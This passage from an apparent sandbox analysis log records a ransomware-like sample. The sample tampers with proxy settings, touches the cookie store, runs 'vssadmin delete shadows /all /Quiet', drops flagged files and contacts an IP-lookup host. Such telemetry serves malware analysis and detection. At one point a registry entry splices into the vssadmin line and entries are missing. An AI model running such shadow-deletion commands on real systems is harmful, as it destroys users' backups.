- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42958
- mode: opened
- sequenceNumber: 330
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1164
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42962
- mode: opened
- sequenceNumber: 331
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1244
- imagepath: C:\Windows\System32\dwm.exe
- md5sum: f162d5f5e845b9dc352dd1bad8cef1bc
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 42979
- mode: opened
- sequenceNumber: 332
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1340
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43016
- mode: opened
- sequenceNumber: 333
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1092
- imagepath: C:\Windows\explorer.exe
- md5sum: ac4c51eb24aa95b77f705ab159189e24
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43020
- mode: opened
- sequenceNumber: 334
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 940
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43025
- mode: opened
- sequenceNumber: 335
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1976
- imagepath: C:\Program Files\Internet Explorer\iexplore.exe
- md5sum: 0685765c0cbe095ba0c6c8790bae21ef
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43040
- mode: opened
- sequenceNumber: 336
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43073
- mode: opened
- sequenceNumber: 337
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1460
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43080
- mode: opened
- sequenceNumber: 338
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1312
- imagepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe
- md5sum: c8a8321292a459b0a17fb39a782a5c74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43086
- mode: opened
- sequenceNumber: 339
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1324
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43092
- mode: opened
- sequenceNumber: 340
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1852
- imagepath: C:\Program Files (x86)\Internet Explorer9\iexplore.exe
- md5sum: 904e13ba41af2e353a32cf351ca53639
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43097
- mode: opened
- sequenceNumber: 341
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2152
- imagepath: C:\Windows\System32\wbem\WmiPrvSE.exe
- md5sum: 619a67c9f617b7e69315bb28ecd5e1df
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42406
- mode: setval
- sequenceNumber: 342
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42406
- mode: setval
- sequenceNumber: 343
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42406
- mode: deleteval
- sequenceNumber: 344
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42407
- mode: deleteval
- sequenceNumber: 345
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42407
- mode: deleteval
- sequenceNumber: 346
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoDetect"
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 42407
- mode: setval
- sequenceNumber: 347
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 21 00 00 00 09 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 0a 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 43201
- mode: failed
- sequenceNumber: 348
- value: C:\Users\Administrator\AppData\Roaming\DNSAPI.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 43205
- mode: opened
- sequenceNumber: 349
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2320
- imagepath: C:\Windows\System32\taskhost.exe
- md5sum: 639774c9acd063f028f6084abf5593ad
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- folder:
- timestamp: 43210
- mode: open
- sequenceNumber: 350
- value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ntstatus: 0x0
- CreateOptions: 0x200000
- apicall:
- timestamp: 42455
- sequenceNumber: 351
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetVolumeNameForVolumeMountPointW
- address: 0x76220aaa
- params:
- param (id:1): NULL
- param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
- apicall:
- timestamp: 42467
- sequenceNumber: 352
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetVolumeNameForVolumeMountPointW
- address: 0x76220e20
- params:
- param (id:1): NULL
- param (id:2): \\?\Volume{a4dcb965-c2b8-11e2-8b83-806e6f6e6963}\
- apicall:
- timestamp: 42471
- sequenceNumber: 353
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetVolumeNameForVolumeMountPointW
- address: 0x76220e20
- params:
- param (id:1): NULL
- param (id:2): \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\
- regkey:
- timestamp: 42530
- mode: setval
- sequenceNumber: 354
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\"CachePrefix" =
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 43451
- mode: failed
- sequenceNumber: 355
- value: C:\Users\Administrator
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- file:
- timestamp: 43455
- mode: failed
- sequenceNumber: 356
- value: C:\Users\Administrator\AppData\Local
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- file:
- timestamp: 43458
- mode: failed
- sequenceNumber: 357
- value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- regkey:
- timestamp: 42537
- mode: setval
- sequenceNumber: 358
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\"CachePrefix" = Cookie:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 43466
- mode: failed
- sequenceNumber: 359
- value: C:\Users\Administrator\AppData\Roaming
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- file:
- timestamp: 43470
- mode: failed
- sequenceNumber: 360
- value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: created
- ntstatus: 0xc0000035
- CreateOptions: 0x200021
- regkey:
- timestamp: 42542
- mode: setval
- sequenceNumber: 361
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\"CachePrefix""C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
- filesize: 167424
- md5sum: e23dd973e1444684eb36365deff1fc74
- sha1sum: 09fafeb1b8404124b33c44440be7e3fdb6105f8a
- ads:
- fid (ads:): 281474976737319
- process:
- timestamp: 43696
- mode: opened
- sequenceNumber: 395
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43700
- mode: opened
- sequenceNumber: 396
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43704
- mode: opened
- sequenceNumber: 397
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2864
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43708
- mode: opened
- sequenceNumber: 398
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2872
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- Ransom:
- timestamp: 43039
- sequenceNumber: 399
- pattern: MC
- value: C:\34aSjIoCE1\k-xbuv.jpg
- md5sum: 098380c72ef9e65a3f005a574cfdf1bb
- process:
- timestamp: 43715
- mode: opened
- sequenceNumber: 400
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43719
- mode: opened
- sequenceNumber: 401
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43723
- mode: opened
- sequenceNumber: 402
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2864
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43727
- mode: opened
- sequenceNumber: 403
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2872
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 43733
- mode: failed
- sequenceNumber: 404
- value: C:\Users\Administrator\AppData\Roaming\DHCPCSVC6.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 43737
- mode: opened
- sequenceNumber: 405
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43741
- mode: opened
- sequenceNumber: 406
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 407
- timestamp: 43617
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 2864
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- process:
- timestamp: 43748
- mode: opened
- sequenceNumber: 408
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2864
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43754
- mode: opened
- sequenceNumber: 409
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2872
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- Ransom:
- timestamp: 43628
- sequenceNumber: 410
- pattern: MC
- value: C:\34aSjIoCE1\kvqmtMjt.txt
- md5sum: 716f17a1c0c6955d09df7d108752499b
- file:
- timestamp: 43761
- mode: failed
- sequenceNumber: 411
- value: C:\Users\Administrator\AppData\Roaming\DHCPCSVC.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 43765
- mode: failed
- sequenceNumber: 412
- value: C:\Users\Administrator\AppData\Roaming\RPCRTREMOTE.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 43770
- mode: failed
- sequenceNumber: 413
- value: C:\Users\Administrator\AppData\Roaming\RASADHLP.DLL
- processinfo:
- tainted: true
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- Ransom:
- timestamp: 43760
- sequenceNumber: 414
- pattern: MC
- value: C:\34aSjIoCE1\nMEkg.xls
- md5sum: a60e4dc73d17d62b4df33d3b6ded21b5
- apicall:
- timestamp: 43795
- repeat: 30
- sequenceNumber: 415
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- network:
- timestamp: 43806
- mode: dns_query
- sequenceNumber: 416
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: myexternalip.com
- malicious-alert:
- classtype: Network-Activity
- weight: 0
- ruleid: 5604 : Network outbound communication attempted ; Process attempting connections via dns_query
- msg: Process attempting connections via dns_query
- display-msg: Network outbound communication attempted
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10098 : Persistance with Self Delete Activity ; Persistance with Self Delete Activity
- msg: Persistance with Self Delete Activity
- display-msg: Persistance with Self Delete Activity
- process:
- timestamp: 43839
- mode: opened
- sequenceNumber: 417
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- network:
- timestamp: 43844
- mode: dns_query_answer
- sequenceNumber: 418
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: myexternalip.com
- answer_number: 1
- ipaddress: 199.16.199.2
- process:
- timestamp: 43849
- mode: opened
- sequenceNumber: 419
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43855
- mode: opened
- sequenceNumber: 420
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2864
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 43860
- mode: opened
- sequenceNumber: 421
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2872
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 43807
- sequenceNumber: 422
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76049c36
- params:
- param (id:1): 0x2a4c7d0
- param (id:2): 260
- process:
- timestamp: 43978
- mode: opened
- sequenceNumber: 423
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44062
- mode: opened
- sequenceNumber: 424
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44067
- mode: opened
- sequenceNumber: 425
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44073
- mode: opened
- sequenceNumber: 426
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- Ransom:
- timestamp: 44188
- sequenceNumber: 427
- pattern: MC
- value: C:\34aSjIoCE1\t_cjYFbB.ppt
- md5sum: 8be21a12e0b706db456dcd6c3db78b61
- process:
- timestamp: 44216
- mode: opened
- sequenceNumber: 428
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44220
- mode: opened
- sequenceNumber: 429
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44224
- mode: opened
- sequenceNumber: 430
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3012
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44296
- mode: opened
- sequenceNumber: 431
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44302
- mode: opened
- sequenceNumber: 432
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 384
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 44306
- mode: opened
- sequenceNumber: 433
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 3012
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- network:
- timestamp: 44333
- mode: http_request
- sequenceNumber: 434
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.2
